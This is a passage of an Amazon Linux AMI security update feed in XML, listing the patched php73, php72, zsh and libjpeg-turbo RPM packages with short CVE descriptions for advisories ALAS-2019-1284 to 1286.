arch="x86_64"><filename>Packages/php73-xml-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.8" 
release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package 
name="php73-process" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.8-1.18.amzn1.i686.rpm</filename></package><package 
name="php73-common" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-embedded" 
version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.8" 
release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.8-1.18.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.8-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1284</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1284: low priority package update for php72</title><issued date="2019-09-13 22:55:00" /><updated date="2019-09-18 21:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11042:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1739465:
CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment()
CVE-2019-11041:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1739459:
CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11041" title="" id="CVE-2019-11041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11042" title="" id="CVE-2019-11042" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.21" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-fpm-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-process" 
version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.21" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.21-1.15.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.21" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-dba-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.21" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-gmp-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.21" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-json-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.21-1.15.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.21" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.21-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1285</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1285: medium priority package update for zsh</title><issued date="2019-09-13 22:56:00" /><updated date="2019-09-18 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13259:
It was discovered that zsh does not properly validate the shebang of input files and truncates it to the first 64 bytes. A local attacker may use this flaw to make zsh execute a different binary than the one expected, namely a binary whose name is a substring of the one given in the shebang.
1626184:
CVE-2018-13259 zsh: Improper handling of shebang line longer than 64
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13259" title="" id="CVE-2018-13259" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="zsh-html" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-html-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="33.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/zsh-debuginfo-5.0.2-33.18.amzn1.x86_64.rpm</filename></package><package name="zsh-html" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-html-5.0.2-33.18.amzn1.i686.rpm</filename></package><package name="zsh" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-5.0.2-33.18.amzn1.i686.rpm</filename></package><package name="zsh-debuginfo" version="5.0.2" release="33.18.amzn1" epoch="0" arch="i686"><filename>Packages/zsh-debuginfo-5.0.2-33.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1286</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1286: medium priority package update for libjpeg-turbo</title><issued date="2019-09-13 22:58:00" /><updated date="2019-09-18 21:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14498:
get_8bit_row in rdbmp.c in libjpeg-turbo through 1.5.90 and MozJPEG through 3.3.1 allows attackers to cause a denial of service (heap-based buffer over-read and application crash) via a crafted 8-bit BMP in which one or more of the color indices is out of range for the number of palette entries.
1687424:
CVE-2018-14498 libjpeg-turbo: heap-based buffer over-read via crafted 8-bit BMP in get_8bit_row in rdbmp.c leads to denial of service
CVE-2018-11813:
libjpeg 9c has a large loop because read_pixel in rdtarga.c mishandles EOF.
1588803:
CVE-2018-11813 libjpeg: "cjpeg" utility large loop because read_pixel in rdtarga.c mishandles EOF
CVE-2018-11214:
An out-of-bounds read vulnerability has been discovered in libjpeg-turbo when reading one row of pixels of a PPM file. An attacker could use this flaw to crash the application and cause a denial of service.
1579980:
CVE-2018-11214 libjpeg: Segmentation fault in get_text_rgb_row function in rdppm.c
CVE-2018-11213:
An out-of-bounds read vulnerability has been discovered in libjpeg-turbo when reading one row of pixels of a PGM file. An attacker could use this flaw to crash the application and cause a denial of service.
1579979:
CVE-2018-11213 libjpeg: Segmentation fault in get_text_gray_row function in rdppm.c
CVE-2018-11212:
A divide by zero vulnerability has been discovered in libjpeg-turbo in alloc_sarray function of jmemmgr.c file. An attacker could use this vulnerability to cause a denial of service via a crafted file.
1579973:
CVE-2018-11212 libjpeg-turbo: Divide By Zero in alloc_sarray function in jmemmgr.c
CVE-2016-3616:
The cjpeg utility in libjpeg allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or execute arbitrary code via a crafted file.
1319661:
CVE-2016-3616 libjpeg: null pointer dereference in cjpeg
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3616" title="" id="CVE-2016-3616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11212" title="" id="CVE-2018-11212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11213" title="" id="CVE-2018-11213" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11214" title="" id="CVE-2018-11214" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11813" title="" id="CVE-2018-11813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14498" title="" id="CVE-2018-14498" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-static" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.90" 
release="8.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.90-8.16.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-devel-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/turbojpeg-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-utils-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="8.16.amzn1" epoch="0" arch="i686"><filename>Packages/libjpeg-turbo-static-1.2.90-8.16.amzn1.i686.rpm</filename></package><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="8.16.amzn1" epoch="0" 